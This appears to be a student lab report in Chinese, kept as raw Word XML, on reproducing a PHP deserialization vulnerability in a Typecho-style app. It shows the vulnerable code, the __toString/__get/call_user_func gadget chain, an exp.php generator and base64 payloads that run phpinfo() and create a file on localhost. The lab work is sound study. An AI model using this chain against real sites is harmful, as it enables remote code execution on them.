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《漏洞利用及渗透测试基础》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 xml:space="preserve">： </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>姜志凯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2011937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信安班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default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复现反序列化漏洞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复现12.2.3中的反序列化漏洞，并执行其他的系统命令。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">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1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查看一个web应用typecho.php的源码，进行分析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/*typecho.php*/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&lt;?php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class Typecho_Db{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public function __construct($adapterName){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$adapterName = 'Typecho_Db_Adapter_' . $adapterName;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class Typecho_Feed{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private $item;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public function __toString(){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$this-&gt;item['author']-&gt;screenName;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class Typecho_Request{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private $_params = array();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private $_filter = array();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public function __get($key)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return $this-&gt;get($key);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public function get($key, $default = NULL)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switch (true) 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case isset($this-&gt;_params[$key]):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$value = $this-&gt;_params[$key];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break;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default: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$value = $default;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break;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$value = !is_array($value) &amp;&amp; strlen($value) &gt; 0 ? $value : $default;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return $this-&gt;_applyFilter($value);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private function _applyFilter($value)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if ($this-&gt;_filter) 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foreach ($this-&gt;_filter as $filter) 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$value = is_array($value) ? array_map($filter, $value) :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    call_user_func($filter, $value);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$this-&gt;_filter = array();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return $value;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$config = unserialize(base64_decode($_GET['__typecho_config']));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$db = new Typecho_Db($config['adapter']);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73675" cy="257365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分析：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程序用到了用户提供的反序列化字符串，并将反序列化对象作为类的参数，所以可以利用。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函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_applyFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>调用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>call_user_func($filter, $value)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，这个可以执行任意系统函数，所以这里是漏洞的入口，编写反序列化字符串使这个函数执行我们想要的函数即可。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·在PHP魔术方法中，如果一个类被当做字符串处理，那么类中的__toString()方法将会被调用，类Typecho_Db的构造函数中，如果参数$adapterName是一个对象，则字符串的拼接会调用toString方法；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·而toString方法定义在Typecho_Feed中，在类Typecho_Feed的__toString()方法中，会访问类中私有变量$item[‘author’]中的screenName，如果$item[‘author’]是一个对象，并且该对象没有screenName属性，那么这个对象中的__get()方法将会被调用；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·而__get()方法定义在Typecho_Request中，这个方法会返回get()，get()中调用了_applyFilter()方法；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·</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>而在_applyFilter()中，使用了PHP的call_user_function()函数，其第一个参数是被调用的函数，第二个参数是被调用的函数的参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；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·</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在这里$filter，$value都是我们可以控制的，因此可以用来执行任意系统命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US"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·至此，完成控制。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分析并编写反序列化字符串</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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首先介绍一个方法：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$age = array(key=&gt;value)：创建一个关联数组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；age[key]表示访问key对应的value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Web应用中是$config['adapter']，所以我们需要构造key为adapter的array，value按之前的攻击链逐层调用：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·</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>考虑攻击链中，期望触发Typecho_Feed的__toString()方法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public function __toString(){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$this-&gt;item['author']-&gt;screenName;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因此，key为“adapter”的value应该为Typecho_Feed对象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$exp = array(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'adapter' =&gt; new Typecho_Feed()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);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echo base64_encode(serialize($exp));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·类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Typecho_Feed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class Typecho_Feed{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private $item;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public function __toString(){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$this-&gt;item['author']-&gt;screenName;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}}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Item里的author应该是Typecho_Request对象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class Typecho_Feed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private $item;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/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public function __construct(){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$this-&gt;item = array(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'author' =&gt; new Typecho_Request(),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);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·构造类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Typecho_Request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通过构造函数实现两个私有变量的赋值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Filter[0]是</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>要调用的函数；（2）screenName是要输入的参数。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class Typecho_Request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private $_params = array();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private $_filter = array();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public function __construct(){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$this-&gt;_params['screenName'] = 'phpinfo()';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$this-&gt;_filter[0] = 'assert';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}  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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回调函数及其对应参数可以更改，随便改都可以，示例函数用的是PHP的assert()函数，如果assert()函数的参数是字符串，那么该字符串会被assert()当做PHP代码执行；参数为assert要执行的php代码phpinfo()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根据以上分析，编写利用代码exp.php：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/*exp.php*/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&lt;?php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class Typecho_Feed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private $item;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ab/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public function __construct(){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$this-&gt;item = array(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    'author' =&gt; new Typecho_Request(),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);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class Typecho_Request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private $_params = array();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private $_filter = array();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public function __construct(){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$this-&gt;_params['screenName'] = 'phpinfo()';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    $this-&gt;_filter[0] = 'assert';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$exp = array(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 xml:space="preserve">    'adapter' =&gt; new Typecho_Feed()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);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echo base64_encode(serialize($exp));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?&gt;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363664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·访问exp.php可得到payload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340995"/>
            <wp:effectExtent l="0" t="0" r="762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ToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVjaG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19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这个就是构造好的反序列化字符串，作为参数注入到原web应用里即可实现反序列化漏洞，使应用跳转执行phpinfo()；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·将payload通过get请求的方式传递给typecho.php，phpinfo()成功执行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http://127.0.0.1/typecho.php?__typecho_config=上边的字符串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44411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更改exp.php,利用漏洞执行系统命令创建一个文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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只需将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Typecho_Request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类中的参数定义改为：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$this-&gt;_params['screenName'] = 'fopen(\'newfile.txt\', \'w\');';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left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$this-&gt;_filter[0] = 'assert';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04460" cy="37414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·访问exp.php得payload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06070"/>
            <wp:effectExtent l="0" t="0" r="1460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ToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVjaG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjI2OiJmb3BlbignbmV3ZmlsZS50eHQnLCAndycpOyI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19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·将payload通过get请求的方式传递给typecho.php，结果如下图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85979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成功！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3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序列化：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="20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序列化是指将对象、数组等数据结构转化为可以储存的格式的过程。程序在运行时，变量的值都是储存在内容中的，程序运行结束，操作系统就会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将内存空间收回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，要想要将内存中的变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>写入磁盘中或是通过网络传输</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，就需要对其进行序列化操作，序列化能将一个对象转换成一个字符串。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="422" w:firstLineChars="20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用如下函数进行序列化：$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>serialize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">d = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>serialize($object)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，参数为类对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr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在PHP中，序列化后的字符串保存了对象所有的变量，但是不会保存对象的方法，只会保存类的名字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="20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反序列化：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将序列化后的字符串恢复为数据结构的过程就叫做反序列化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="20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用如下函数进行反序列化：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$object = unserialize($serialized)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参数为序列化对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="0" w:firstLineChars="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php魔术方法：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一类特殊的方法，在实例化类是会被调用。常见的魔术方法有：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__construct()，类的构造函数，创建新的对象时会被调用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__destruct()，类的析构函数，当对象被销毁时会被调用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__call()，在对象中调用一个不可访问方法时会被调用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__callStatic()，用静态方式中调用一个不可访问方法时调用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__get()，读取一个不可访问属性的值时会被调用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__set()，给不可访问的属性赋值时会被调用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__isset()，当对不可访问属性调用isset()或empty()时调用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__unset()，当对不可访问属性调用unset()时被调用。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__sleep()，执行serialize()时，先会调用这个函数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__wakeup()，执行unserialize()时，先会调用这个函数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__toString()，类被当成字符串时的回应方法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__invoke()，调用函数的方式调用一个对象时的回应方法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__set_state()，调用var_export()导出类时，此静态方法会被调用。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__clone()，当对象复制完成时调用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__autoload()，尝试加载未定义的类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="2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__debugInfo()，打印所需调试信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="0" w:firstLineChars="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如何利用反序列化漏洞：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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>unserialize()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函数，有两个参数，第一个为调用的函数，第二个为调用的函数的参数，通过调用unserialize()函数，可以实现执行任意系统命令，达到漏洞利用的目的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="20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如果一个web应用从用户处获取反序列化对象，则可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>精心构造反序列化字符串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，作为该web应用的参数传入，让该web应用执行我们想要的函数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN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EDF26B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F9EDF2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0369C33"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="10369C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54DB345"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="354DB34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jZjI3MTZiYzdjMjBkZDc5MzA0NmIwODNhMjhhZGY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CAB5C49"/>
    <w:rsid w:val="2D864A94"/>
    <w:rsid w:val="6039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257</Words>
  <Characters>306</Characters>
  <Lines>2</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>4</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>331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WPS_1645435849</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-16T10:41:52Z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5589873C489A494285F26CDDDD5DEBF0</vt:lpwstr>
  </property>
</Properties>
</file>